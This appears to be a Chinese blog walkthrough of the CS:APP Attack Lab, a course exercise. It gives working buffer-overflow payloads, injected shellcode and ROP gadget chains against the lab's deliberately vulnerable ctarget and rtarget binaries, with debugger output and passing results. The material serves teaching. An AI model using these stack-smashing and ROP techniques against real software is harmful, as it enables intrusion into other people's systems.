csapp attack lab

Akura@lan

已于 2022-02-28 23:00:05 修改

阅读量200

点赞数

分类专栏：操作系统文章标签：系统安全操作系统

于 2022-02-28 20:49:33 首次发布

本文链接：https://blog.csdn.net/qq_46441427/article/details/123059114

版权

操作系统专栏收录该内容

8 篇文章 1 订阅

订阅专栏

准备工作

（根据cmu上的write up翻译）
文件有：
readme.txt:描述了目录下的文件
ctarget:代码注入的可执行文件
rtarget:返回导向编程的可执行文件
cookie.txt:一个8个十六进制数组成的
farm.c:一些可以用来打rop的gadget的源码
实验都用的ret指令，会返回三个地方：（1）touchx函数（2）自己写的代码（3）从farm中得到的gadget
所有的输入都是这样一个getbuf()函数：

1 unsigned getbuf()
2 {
3 char buf[BUFFER_SIZE];
4 Gets(buf);
5 return 1;
6 }

Gets和标准库函数gets差不多，读取一个标准输入（以/x00结尾或者文件结尾）到一个特定的位置
如果输入的串太短，就会返回1，如果过长，就会报段错误
这里是一些帮助：

> -h: Print list of possible command line arguments
-q: Don’t send results to the grading server
-i FILE: Supply input from a file, rather than from standard input

level1

1 void test()
2 {
3 int val;
4 val = getbuf();
5 printf("No exploit. Getbuf returned 0x%x\n", val);
6 }

要我们执行touch1

1 void touch1()
2 {
3 vlevel = 1; /* Part of validation protocol */
4 printf("Touch1!: You called touch1()\n");
5 validate(1);
6 exit(0);
7 }

很简单，改返回地址为touch1就行,找到是0x4017c0
缓冲区是0x28

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq   
  4017be:	90                   	nop
  4017bf:	90                   	nop

这里直接无脑偏移加地址就行了

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 c0 17 40 00

用hex2raw把16进制数转换成攻击代码
然后执行ctarget带文件输入就可以了

ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ vim level1.txt
ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ ./hex2raw < level1.txt > level1r.txt
ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ ./ctarget -q -i level1r.txt

hex2raw很有意思，初学pwn时没有看pwntools的源码，所以以前写wp常常很多错误。这里进行一个小感慨

level2

执行touch2，并且以cookie做为参数传给touch2，告诉我们不能用ret

1 void touch2(unsigned val)
6
2 {
3 vlevel = 2; /* Part of validation protocol */
4 if (val == cookie) {
5 printf("Touch2!: You called touch2(0x%.8x)\n", val);
6 validate(2);
7 } else {
8 printf("Misfire: You called touch2(0x%.8x)\n", val);
9 fail(2);
10 }
11 exit(0);
12 }

vim ./shellcode2.s
mov $0x59b997fa,%rdi
push $0x4017ec
ret
gcc -c shellcode2.s
ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ objdump -d shellcode2.o
shellcode2.o：     文件格式 elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
   7:	68 ec 17 40 00       	pushq  $0x4017ec
   c:	c3                   	retq

需要找到栈地址，然后单步s执行sub $0x28 %rsp,在ret的时候rsp就是我们输入的shellcode了

b *0x4017a8
r -q
0x5561dc78

已知偏移为0x28。所以这样编写exp：

48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55

ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ ./ctarget -q -i level2r.txt
Cookie: 0x59b997fa
Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55

level3

level3要返回到touch3，并且要通过hexmatch函数

11 void touch3(char *sval)
12 {
13 vlevel = 3; /* Part of validation protocol */
14 if (hexmatch(cookie, sval)) {
15 printf("Touch3!: You called touch3(\"%s\")\n", sval);
16 validate(3);
17 } else {
18 printf("Misfire: You called touch3(\"%s\")\n", sval);
19 fail(3);
20 }
21 exit(0);
22 }

1 /* Compare string to hex represention of unsigned value */
2 int hexmatch(unsigned val, char *sval)
3 {
4 char cbuf[110];
5 /* Make position of check string unpredictable */
6 char *s = cbuf + random() % 100;
7 sprintf(s, "%.8x", val);
8 return strncmp(sval, s, 9) == 0;
9 }

传入的是字符串地址，那这里可以把字符串放到其他地方，比如ret_addr的下面，然后其他的都和level2差不多
注意对齐和字符串00结尾就行了

48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 00

ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ ./ctarget -q -i level3r.txt
Cookie: 0x59b997fa
Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00

level4

开启了NX和ASLR
也就是说栈上的数据是不能当指令执行的，且栈段加载的地址也不一样
要点就是要记住ret是根据栈顶的数据来返回指令，就是jmp %rsp
这里有很多的程序片段（gadget）可以执行，可以用来构造一些完整的程序链。
那这里思路可以借助这些程序链，ret到一条程序指令，然后构造栈上的数据来达成目的
要参考一下官网的表格
看了一下，没有5f对应的编码，都是给值到rax，那可以用rax是返回值来执行目标指令

00000000004019ca <getval_280>:
  4019ca:	b8 29 58 90 c3       	mov    $0xc3905829,%eax
  4019cf:	c3                   	retq

此处58 90 c3就是pop rax ;ret的编码，所以填4019cc(前面的两个字节不要)

00000000004019a0 <addval_273>:
  4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  4019a6:	c3                   	retq

此处 48 89 c7 c3就是mov %rax，%rdi；ret指令编码
然后直接跟touch2地址就行了，因为上一个gadget有ret
答案：

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
cc 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

level 5

思路：不知道字符串地址，就把这个栈顶地址给rax，然后通过偏移再来找

0000000000401a03 <addval_190>:
  401a03:	8d 87 41 48 89 e0    	lea    -0x1f76b7bf(%rdi),%eax
  401a09:	c3                   	retq

对应 mov %rsp，%rax ；ret 地址为：401a06
上一题的mov %rax,%rdi接着拿来用 4019a2
pop %rax接着用 4019cc
这里查过了只有用%rax->%rcx->%rdx->%rsi

00000000004019db <getval_481>:
  4019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax
  4019e0: c3    
0000000000401a6e <setval_167>:
  401a6e: c7 07 89 d1 91 c3     movl   $0xc391d189,(%rdi)
  401a74: c3  
0000000000401a11 <addval_436>:
  401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax
  401a17: c3                    retq

0x4019dd
0x401a70
0x401a13
然后把字符串+偏移给rax

00000000004019d6 <add_xy>:
  4019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax
  4019da: c3                    retq

最后再次的0x4019a2,%rax->%rdi。
所以最后答案

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
cc 19 40 00 00 00 00 00 
xx 00 00 00 00 00 00 00
dd 19 40 00 00 00 00 00
70 1a 40 00 00 00 00 00
13 1a 40 00 00 00 00 00
d6 19 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61 00

确定xx，可以通过调试，当然，这里ret到401a06后rsp往下指，到4019a2，然后执行mov %rsp %rax，中间就是0x48个

ubuntu20@ubuntu20-virtual-machine:~/Desktop/CSAPP/lab3_attacklab$ ./rtarget -q -i rop2r.txt
Cookie: 0x59b997fa
Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 CC 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 70 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00